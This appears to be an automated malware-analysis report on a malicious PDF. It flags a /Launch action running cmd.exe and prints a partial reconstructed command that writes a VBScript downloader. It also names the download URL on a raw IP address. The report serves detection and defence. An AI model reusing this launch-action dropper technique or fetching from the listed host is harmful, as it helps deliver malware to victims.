MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File
T1059.003 Windows Command Shell
The PDF file contains a launch action that executes cmd.exe. This command attempts to create a VBScript file named 'm.vbs' by concatenating strings, which is then likely intended to be executed. The script itself is not fully extracted but the launch action and embedded URL strongly suggest a downloader or dropper functionality. The reconstructed command line is: cmd /c echo B="m.vbs":With CreateObject(StrReverse("PTTHLMX.2LMXSM" "Scripting.FileSystemObject" A.GetSpecialFolder(2 "WScript.Shell" 2.
Heuristics 4
-
Launch action high PDF_LAUNCHPDF contains a /Launch action with an unresolved or extension-less target — treat as potentially dangerous
-
Embedded script payload in PDF stream high PDF_EMBEDDED_SCRIPT_PAYLOADPDF stream bytes contain script execution markers such as ActiveXObject/CreateObject, WScript.Shell, PowerShell, or shell-exec primitives. This is stronger than ordinary PDF JavaScript because it indicates a staged external script payload hidden in stream bytes.
-
/Launch action target: cmd high PDF_LAUNCH_COMMANDPDF /Launch action specifies an executable target with parameters '/c echo B="m.vbs":With CreateObject(StrReverse("PTTHLMX.2LMXSM"'.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://82.146.44.90/f/tmp/m.vbs
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
embedded_pdf_script_0000006f.binad55c8e83a5896a04b2012c676820daeab2b84cc539e444c6366e79f55a571c5 |
pdf-embedded-script | PDF decompressed stream script payload at offset 0x6F | 63 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.